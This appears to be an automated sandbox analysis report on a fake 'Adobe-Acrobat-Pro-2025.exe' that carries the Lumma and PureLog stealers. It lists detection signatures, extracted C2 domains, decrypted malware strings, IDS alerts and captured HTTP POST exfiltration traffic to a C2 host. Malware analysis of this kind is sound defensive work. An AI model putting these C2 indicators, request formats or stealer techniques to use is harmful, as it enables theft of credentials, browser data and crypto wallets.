Edit tour

Windows Analysis Report
Adobe-Acrobat-Pro-2025.exe

Overview

General Information

Sample name:	Adobe-Acrobat-Pro-2025.exe
Analysis ID:	1591985
MD5:	b3eea0239b9e344a94a25d0c0c17c9d0
SHA1:	e5cb8f568df68cb0b8c14811d14096af6690c936
SHA256:	a8e028e06b6e58a256e997f803a43b68d4f1224beba4a49c490f6934addaca77
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected PureLog Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Adobe-Acrobat-Pro-2025.exe (PID: 5768 cmdline: "C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe" MD5: B3EEA0239B9E344A94A25D0C0C17C9D0)

Adobe-Acrobat-Pro-2025.exe (PID: 2316 cmdline: "C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe" MD5: B3EEA0239B9E344A94A25D0C0C17C9D0)

WerFault.exe (PID: 6416 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 908 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["strivehelpeu.bond", "pain-temper.bond", "stripedre-lot.bond", "growthselec.bond", "jarry-deatile.bond", "sobrattyeu.bond", "immolatechallen.bond", "crookedfoshe.bond", "jarry-fixxer.bond"], "Build id": "yau6Na--899083440"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Adobe-Acrobat-Pro-2025.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.2170361115.0000000000012000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: Adobe-Acrobat-Pro-2025.exe PID: 2316	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.0.Adobe-Acrobat-Pro-2025.exe.10000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Adobe-Acrobat-Pro-2025.exe.3539550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Adobe-Acrobat-Pro-2025.exe.3539550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T16:14:22.280853+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	104.21.80.1	443	TCP
2025-01-15T16:14:23.342039+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	104.21.80.1	443	TCP
2025-01-15T16:14:27.594769+0100	2028371	3	Unknown Traffic	192.168.2.5	49713	104.21.80.1	443	TCP
2025-01-15T16:14:28.912666+0100	2028371	3	Unknown Traffic	192.168.2.5	49716	104.21.80.1	443	TCP
2025-01-15T16:14:33.444611+0100	2028371	3	Unknown Traffic	192.168.2.5	49747	104.21.80.1	443	TCP
2025-01-15T16:14:35.079971+0100	2028371	3	Unknown Traffic	192.168.2.5	49759	104.21.80.1	443	TCP
2025-01-15T16:14:39.403619+0100	2028371	3	Unknown Traffic	192.168.2.5	49791	104.21.80.1	443	TCP
2025-01-15T16:14:42.715190+0100	2028371	3	Unknown Traffic	192.168.2.5	49808	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T16:14:22.821880+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49705	104.21.80.1	443	TCP
2025-01-15T16:14:26.946027+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49706	104.21.80.1	443	TCP
2025-01-15T16:14:43.210932+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49808	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T16:14:22.821880+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49705	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T16:14:26.946027+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49706	104.21.80.1	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T16:14:28.407852+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49713	104.21.80.1	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T16:14:39.412394+0100	2843864	1	A Network Trojan was detected	192.168.2.5	49791	104.21.80.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.Adobe-Acrobat-Pro-2025.exe.3539550.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["strivehelpeu.bond", "pain-temper.bond", "stripedre-lot.bond", "growthselec.bond", "jarry-deatile.bond", "sobrattyeu.bond", "immolatechallen.bond", "crookedfoshe.bond", "jarry-fixxer.bond"], "Build id": "yau6Na--899083440"}

Multi AV Scanner detection for submitted file

Source: Adobe-Acrobat-Pro-2025.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 94.9% probability

Machine Learning detection for sample

Source: Adobe-Acrobat-Pro-2025.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String decryptor: jarry-fixxer.bond
Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String decryptor: pain-temper.bond
Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String decryptor: jarry-deatile.bond
Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String decryptor: growthselec.bond
Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String decryptor: stripedre-lot.bond
Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String decryptor: immolatechallen.bond
Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String decryptor: crookedfoshe.bond
Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String decryptor: strivehelpeu.bond
Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String decryptor: sobrattyeu.bond
Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String decryptor: yau6Na--899083440

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Code function: 1_2_00414F9B CryptUnprotectData,

1_2_00414F9B

Source: Adobe-Acrobat-Pro-2025.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49808 version: TLS 1.2

Source: Adobe-Acrobat-Pro-2025.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb/^ source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: System.Windows.Forms.pdb< source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: Manjohn.pdb source: Adobe-Acrobat-Pro-2025.exe, WERD9A3.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WERD9A3.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WERD9A3.tmp.dmp.5.dr

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0042D847
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov word ptr [ecx], ax	1_2_00424050
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov esi, ecx	1_2_0043F02C
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_0042D9BD
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-01A231D7h]	1_2_0043DA20
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_0042EBAA
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi+50h]	1_2_0040D4F2
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53585096h	1_2_0043F5FD
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 4B884A2Eh	1_2_00441F40
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov dword ptr [esp], ecx	1_2_0043A7A0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov ecx, eax	1_2_0043A7A0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov ebp, edx	1_2_0042A050
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov word ptr [edi], cx	1_2_0041405B
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then test esi, esi	1_2_0043B870
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	1_2_00414830
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov edx, ecx	1_2_00414830
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_0042D0F9
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0042D8AE
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0042D8B3
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov ecx, edx	1_2_004210B0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_0042D15C
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_0042D15C
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi-360A8460h]	1_2_00440960
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_0042D188
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_0042D188
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	1_2_004021A0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi-360A8460h]	1_2_00440A50
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then push esi	1_2_00428A7F
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	1_2_0041DA30
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-430BA0B3h]	1_2_00424AC0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov dword ptr [esp], D07BD209h	1_2_00424AC0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	1_2_004072E0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	1_2_004072E0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_0042AAF0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov dword ptr [ebp-2Ch], edi	1_2_0043EA83
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 3F2C504Eh	1_2_00413A92
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 6206A877h	1_2_00413A92
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	1_2_00402AA0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov ecx, ebp	1_2_00408BE0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov ebx, edx	1_2_004263E6
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+02h]	1_2_00420BB0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	1_2_00416BBC
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then jmp ecx	1_2_0043FC42
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	1_2_00440C10
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movsx edx, byte ptr [esi+eax]	1_2_0041DCA0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then push 00000000h	1_2_0040BD40
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov word ptr [edi], ax	1_2_0043FD53
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+08h]	1_2_0043DD60
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00437560
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movzx edx, cx	1_2_0042CD69
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov ebx, edi	1_2_0041BD20
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0043FE0B
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then lea edx, dword ptr [ecx-76C6AE7Eh]	1_2_0042D6DE
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then lea edx, dword ptr [ecx-76C6AE7Eh]	1_2_0042D6E9
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_0042EEF7
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	1_2_00418690
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	1_2_00426F60
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then cmp word ptr [esi+ecx], 0000h	1_2_0041AF75
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	1_2_0043DF10
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then push eax	1_2_0040BFE0
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+1Ch]	1_2_00424780
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-430BA0B3h]	1_2_00424780
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then mov dword ptr [esp], D07BD209h	1_2_00424780
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-6Bh]	1_2_0043DF80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49713 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49791 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49808 -> 104.21.80.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: strivehelpeu.bond
Source: Malware configuration extractor	URLs: pain-temper.bond
Source: Malware configuration extractor	URLs: stripedre-lot.bond
Source: Malware configuration extractor	URLs: growthselec.bond
Source: Malware configuration extractor	URLs: jarry-deatile.bond
Source: Malware configuration extractor	URLs: sobrattyeu.bond
Source: Malware configuration extractor	URLs: immolatechallen.bond
Source: Malware configuration extractor	URLs: crookedfoshe.bond
Source: Malware configuration extractor	URLs: jarry-fixxer.bond

Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49759 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49791 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49747 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49808 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3AEJNYBVCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12785Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=12OJWFQG2G0S3KG5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15069Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1IUYL71TLHY30EGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20553Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9JQAVX875JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1382Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8C2VKGC7DB4ZJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569315Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: sobrattyeu.bond

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: sobrattyeu.bond

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sobrattyeu.bond

Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: Adobe-Acrobat-Pro-2025.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
